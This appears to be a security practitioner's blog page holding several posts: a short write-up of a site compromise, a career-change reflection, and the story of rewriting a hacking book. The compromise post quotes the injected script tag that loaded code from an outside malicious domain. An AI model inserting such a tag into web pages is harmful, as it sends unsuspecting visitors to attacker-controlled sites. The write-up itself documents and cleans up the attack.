Last Updated on Tuesday, 17 May 2011 15:09 Written by Brian Baskin Thursday, 07 April 2011 17:52

Due to the very nature that this is a website on the Internet means that eventually it would be susceptible to an attack. Wordpress and blog sites are notoriously targeted with infections that append code to HTML files that point them to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.

Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else.  I was sitting at my desk and quickly opened it to verify.  Sure enough, it was:

I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on. 

The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file: 

<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n

 With the infection spotted, I checked the file's MAC times to see when the attack occurred:

Last Updated on Friday, 31 December 2010 21:52 Written by Brian Baskin Saturday, 11 December 2010 18:05

Last Updated on Monday, 08 November 2010 21:36 Written by Brian Baskin Thursday, 04 November 2010 14:10

I am just finishing up my first week at my new place of employment, cmdLabs, LLC.  What an amazing roller coaster ride.

Let's revisit the past ten years... just to get it off my mind and on paper.

It was with very mixed feelings that I left my former employee, where I had been employed for over 10 years. In late 1999 and early 2000 I was working as a network engineer at a NASDAQ data center near Washington, DC, suffering through the daily commutes. Through a friend I learned of a government facility where they were teaching computer forensics and investigations. It was outside of my skill set, but something I wanted passionately to be involved in. So, I made the leap to join CSC on the Defense Computer Investigations Training Program (DCITP) contract, as it was known at the time (now called the Defense Cyber Investigations Training Academy - DCITA), part of the Defense Cyber Crime Center (DC3).  The downside to the move? I had to start at the ground floor. I started as classroom technical support. It was literally starting at the bottom rung of the ladder. 

I did my work, head down, and found new ways to improve upon processes. I built databases, performed research, and eventually became a research aide to many of the instructors. When they got stumped by a hard question from a student, I would receive a pager message (yes, we had text pagers back then), and would try to get an answer within five minutes. After about a year of hard work, I raised the question - Let me teach. Let me start small, by teaching a hardware block of the introduction class. After a month or two of deliberation, they decided to give me a one-hour block teaching motherboard technology, with it recorded and reviewed by the government customer. I went up and did my thing - 15 minutes into the presentation slicing my arm with a sharp solder leg and bleeding out. I casually grabbed a towel used for cleaning the white board, placed it on my arm, and used a demo motherboard to apply pressure - all without missing a step and without the students even being away (AFAIK). 

I was given the job of being an instructor, and I started grabbing modules to teach. Within a year I has mastered all of the hardware/software/OS lessons of our core course and was the sole expert on the Linux section (being a user since 1994). Eventually, my need for more outgrew the class and I was moved to the Incident Responders team, where I started renovating their methods of Linux/Solaris incident response. I grew out from there into the Forensics material where I focused on host-based application artifacts. I then moved into Intrusions where I worked to renovate the Solaris Intrusion Response (FISE) course and build a new Linux Intrusion Response (FILE) course.

And all that in the space of just four years. I was working with Johnny Long on rebuilding our online investigations material, and we redesigned the course into new territories. Based upon much of my research, Johnny approached me with a side project. A Syngress project on IM/P2P security had lost an author and they needed someone to write the P2P analysis section, quickly. I then started researching and writing the Gnutella, Kazaa, and BitTorrent sections of the book, having them complete in just a month. And so began my side-career of being a "closer" for Syngress, but that's another story... But the research from that time, and since, has helped me become a premier P2P forensics researcher.

Eventually, by 2006, I had a mastery of the courses and was hitting a wall. At that point I was promoted to the Deputy Lead Technical Engineer position. I worked to review and authorize content changes to all of our courses. I performed extensive research on new forensic responses, next to Johnny who did research on new attacks, and then integrated the research into our training materials.

I also worked special projects for most of that period. When something huge came down the road, I was pulled to knock it out. One example was when, in 2008, the US Secret Service came to our customer with a huge project.  They were establishing a brand new forensic school house in Alabama called the NCFI, where they would train state and locals in digital forensics. They asked us to develop seven courses with scenarios, instructor guides, PowerPoints, and handbooks, in a matter of six months. I was placed as the team lead and given four extensively qualified instructors to knock out the project. Which we did, on time and greatly under budget.

It was a dream job. It was my dream job. Yet, I left.  Why?  I pretty much hit my peak there. The projects that were coming down the line were less technical and less cutting-edge. They were more compliance-based to ensure we had standardized formats and guides. A lot of great technical work was still in process, but not enough to scratch my itch. After so many years there, I knew what was coming, and there were no big surprises left. So, it was very difficult to say goodbye to my family at CSC and DC3. A facility full of the brightest people doing great work.  I feel like I've played a big hand in growing DCITA and DC3 to where it is today. I realize this sounds like I'm bragging of my work there, but it's just to show how strongly I feel about my family there.

I have moved on to become a Senior Consultant with cmdLabs, a wholly-owned subsidiary of The Newberry Group. I joined as the first real employee under the three partners: Eoghan Casey, Terrance Maguire, and Chris Daywalt. It's an exciting adventure, working out of cmdLabs' forensic lab in downtown Baltimore, but an opportunity to go the next step. This will literally be a ground floor operation to build out its capabilities, explore new forensic trenches, and have fun in the process.

What is there to learn from this? Do something you care about! Work in a field in which you are passionate! If you're not there right now, then get there. And realize that sometimes that takes a sacrifice. Don't expect that every new job is going to be an increase. You will take pay cuts, benefit cuts, and other sacrifices. But those are minor when compared to doing work that gives your life new meaning. Stop looking for a job that pays $10K more and look for one that you will gladly wake up every morning to do. And when, at a point, you've exhausted your stretch at one place, don't feel confined there. Seek out to improve yourself. 

And to my friends with CSC/DC3. I will definitely miss you. But, as you all know, this is an extremely small community. 

Last Updated on Friday, 23 July 2010 00:59 Written by Brian Baskin Monday, 19 July 2010 21:33

This month the revised edition of Dissecting the Hack: The F0rb1dd3n Network was released to the public. This is an awesome moment to finally put a major project to rest and look forward to the future (and any potential bad reviews :))

The back story is full of enough gossip to almost equal that of the LIGATT controversy. Without going into details, Jayson Street worked up a plan for a fictional hacker story with a technical reference section to explain the techniques used in the story. However, as Jayson worked to finish the fictional side before the deadline, they contacted someone to work up the technical portion. The person that wrote the technical, non-fiction portion copied much of the material from public sources without citation or attribution. From what I've learned, this is the kiss of death in the publishing world, a huge scandal that can cause a major set back for a company. His book had a technical editor, whose job it is to ensure that the material is original, clean, and appropriate for the tone of the book. The technical editor also wrote the technical material, normally a line that isn't crossed. It was a situation that everyone thought would go cleanly, but didn't.

What follows here is basically what occurred after that point. Some details have been omitted, others glossed over, and overall it was a great experience.

Let's Do This Thing

When Jayson Street was surprised about the plagiarism late on a Friday night, news hit the InfoSec Twitter world hard. Accusations were flying and he stuck around to put forth his side of the story. During this time, he was in talks with Marcus Carey who helped talk him off the ledge and work on a strategy for moving forward.  A few days later, Marcus calls me at home to fill me in on the situation and the new strategy: Marcus would be re-writing the technical portion and they wanted me to act as the technical editor.  I looked at my work load, and family load (my wife had JUST delivered a baby, with me assisting, the Tuesday after the story broke) and decided that I could help.

Time went by. DojoSecs were scheduled, Marcus and I both gave talks at TechnoForensics, DojoCon kicked off, and lots of life events occurred. There were many offers of assistance from others in the field, but the process needed to be tight and clean, with formal contracts for everyone. So, many offers of assistance just couldn't be accepted.

Towards December, Jayson and Marcus crafted together a genius idea: play out the story in real life through Twitter and web servers. They spent weeks organizing the events and time lines, crafting scripts, registering domains, with Marcus putting together a guide on how the reader can follow along in the real world. The reader can actually perform the reconnaissance steps used in the story to see how the attacks could be done. A sandbox was created for the reader to play in.

It was an excellent idea, but it required a lot of time and effort. And, through its development, it caused the manuscript to become very late. Now, obviously, a publisher is not happy with late deadlines. Syngress had a goal in mind to get the book printed and on shelves by the time ShmooCon hit in early February. At ShmooCon, we were just finishing up our final edits. Egg on us, but it really was to make a better product. Still... egg. Communications should have been better.

Then, as part of the final review cycle, issues arose. The editors didn't like the way that the material was flowing. Marcus's content relied on keeping material simple and approachable, and was full of personal anecdotes. Many thought the non-fiction would be better off in a very tight structure, instead of the loose story-telling that it currently was in.  

And so, after many months of effort, the call was made to scrap the material and be done with the book.

Rewind

I don't hold anything against Syngress. They were fully within their rights, and their timelines had already slipped. The book had moved into dangerous territory and they were trying to protect their company. However, we didn't back down. At the end of February, after emails, phone calls, and conference calls, they agreed to let us have another go at it - with very strict rules.

They needed a new technical writer to write the material, and I turned it down. Life was too hectic, work was WAY too hectic, and I was taking two college courses. After a few days, though, I was notified that there wasn't much luck finding a new writer and the book would likely die. 

So, at this point, I would be the primary writer. A new technical editor would be found to review the material. Syngress also brought in a development editor to review the material for any copyright or legal issues, with the lead editor also reviewing material. There would now be almost half a dozen eyes on every sentence throughout the process. And, we had a month to complete the process.

Beware the Ides of March

It was an aggressive schedule, to be sure. It was a large sacrifice, and a large amount of effort, but the only other choice was to let the book die and lose everything. And I would never be able to live with myself if that occurred. 

Syngress hashed out a structure for me to follow, assigned staff, and we started working. I had to go at a fairly fast clip, but generally averaged one page per hour. Even pages with images followed that same rate, as the images had to be prepared exactly right. My personal goal was to hit out 10 pages a day, with weekends being great writing days. I worked in chunks. Chapters 1, 2, and 3 came first. I would finish chapter 1 (Recon), submit it for review, and then immediately started on 2. After 2 was complete, I'd submit it and work on 3. By the time 3 was nearing completion, my first reviews on 1 would return with changes I needed to make.  The actual development time on a single chapter, including research and writing, was around 3-4 days.

After the first three chapters were done, we then set them in stone and moved onto the last few. It was late into this process that Dustin Trammell (I)ruid) came on board to perform the technical editing and he was a God send. He took to my prose with a scalpel and smoothed out the flow, fixed grammar issues I didn't even notice, and helped carve out my very comma-friendly writing. (I love to use commas a lot, and it's a habit I've been trying to fight).  I don't think I)ruid really knew how fast the bus was going that was about to run him over :)

We then went through a barrage of image copyrights. Everything was scrutinized to determine if it could be used. Many images were pulled from the content when all was said and done, some due to just the amount of time it would take to get a signed release.  Some groups allowed us to report images from their websites and products, and I greatly appreciated the effort. A few knew of the previous situation and put in stipulations that the old technical editor would not, in any way, be working on the new book. They didn't want their good names tainted with a scandal, which I can definitely appreciate and understand.

Work continued on. I was putting in 45-50 hour work weeks in my day job, spending 9-10 hours a week commuting, and 8-9 hours a week taking college courses. I then spent nearly every spare moment I had writing. I would lock myself in the basement as soon as I came home, coming up only for a brief 30 minute dinner, then back to work. Work would end around 11PM every night, I'd get ready for bed, then up the next morning at 0430 to start all over again. When all was said and done, I had logged over 300 hours into the project.

In the middle of the month I also volunteered as a judge for the MidAtlantic Collegiate Cyber Defense Competition. An awesome experience, one that I enjoyed immensely, as I worked with two college blue teams with their technical questions and incident response forms. But, it logistically hurt. It took place on two days in which I was off from work, so I had to give up two good writing days. My solution was to stay at a hotel next to the building to avoid the 2 hours/day commute and focus on the writing.

Work load increased. Every review cycle brought new, hard-hitting questions. Errors were found, issues needed resolution, tempers flared. Jayson Street and I talked 2-5 times a day through email or phone, motivating each other through the process. Jayson was already providing needful advice through the process, helping me unravel the story and understand the motivations and techniques. We commiserated together as he was going through his cancer treatment at the time, but at least the jokes never stopped coming.

Things get serious 

Half way through the month of March things got serious. It was a Sunday night, the day before my first big deadline, and I froze in my seat. A hot, searing pain radiated through my body, starting from my chest and along my left arm and upper back. My first though was that I was having a heart attack. I had just lost my brother-in-law (Christopher Byrne, RIP) in January of 2009 at the age of 32 to a heart attack, and I had just turned 30. My family was upstairs, I was in the basement, and I couldn't move. The pain increased, and I could barely breath. Then, unusually, the pain continued. From my scant experience I figured the pain would be quick and done, but it actually lasted for over two hours. At that time, I could breath and walk again, but was still in constant pain. I went to bed, hiding my affliction from my family.

The next morning I woke up in serious pain, still. I told my wife, then drove to an urgent care center. A quick electrocardiogram and they couldn't see anything wrong and referred me to a cardiologist. To make a long story short, the pain lasted for seven weeks in intervals lasting from an hour to five hours long. After an echocardiogram and stress test, the doctor could find nothing wrong.  His diagnosis: "calm the hell down and stop getting so stressed" (that was verbatim, I liked that doctor :)).

Help, Marcus!

During much of this process, Marcus went offline. While he was rebuilding himself (with the assistance of P90X), he took some time off the Internet. Marcus was still a very central person to the entire project and he needed his place in the project. As part of the brainstorming he and Jayson had around Christmas, they devised a plan for various interviews on Information Security to be transcribed into the book. The first such interview was done with Dan Kaminsky at ShmooCon, with the video made available soon after on the Internet. 

After weeks of effort, Jayson and Marcus were able to secure interviews with many of the great celebrities in our industry: Jeff Moss (who I had the pleasure of meeting at our DoD Cyber Crime Conference), Johnny Long (always a pleasure to include a friend), and Marcus Ranum (who had recently gave an insightful presentation at a DojoSec). There was a lot of pressure on Marcus and Jayson to get the releases in place, schedule the interviews with Marcus Carey, and to manually transcribe all of the text, but the results were impressive!  

On Reflection

When the book was all said and done, the pressure dropped immensely. I had the chance to review the work and mostly liked what I had created. There were issues the editors brought up that I tried to resolve, some better than others. Suggestions made by I)ruid were well received and resolved. There were some exceptions where great suggestions were made that I just could not complete due to exhaustion, and the mental roadblock of taking a 100% chapter and moving it back to 90%.  Wish I could, wish I had, but we'll see how it hurts the book.

In April they estimated the book would be out by the week of Black Hat, which made everyone happy. To have the book available at Black Hat and DEFCON for sales was a BIG THING. Our fingers were crossed.

And then, it came! On July 1 my wife was presented with a surprise package from Syngress. It was the book! I rushed home that evening and looked at the book in its pristine shrink wrap... then packed it back away, unopened. It was too much to take. All the blood, sweat, and tears that went into the book came back to my mind. Opening this book would be a final confirmation that it was over, that we could move on. And I just couldn't do it.

It took me almost a week, with persuasion from my wife and from Jayson, before I finally opened the book and flipped through. There was the image of .ronin and his VERA-NG rifle from ShmooCon, the review of CP's Advanced Dork Firefox add-on, the stories from my own past experience. It was over. It wasn't perfect. It wasn't easy. It was the largest pro bono project I've ever done. But, it was well worth the effort.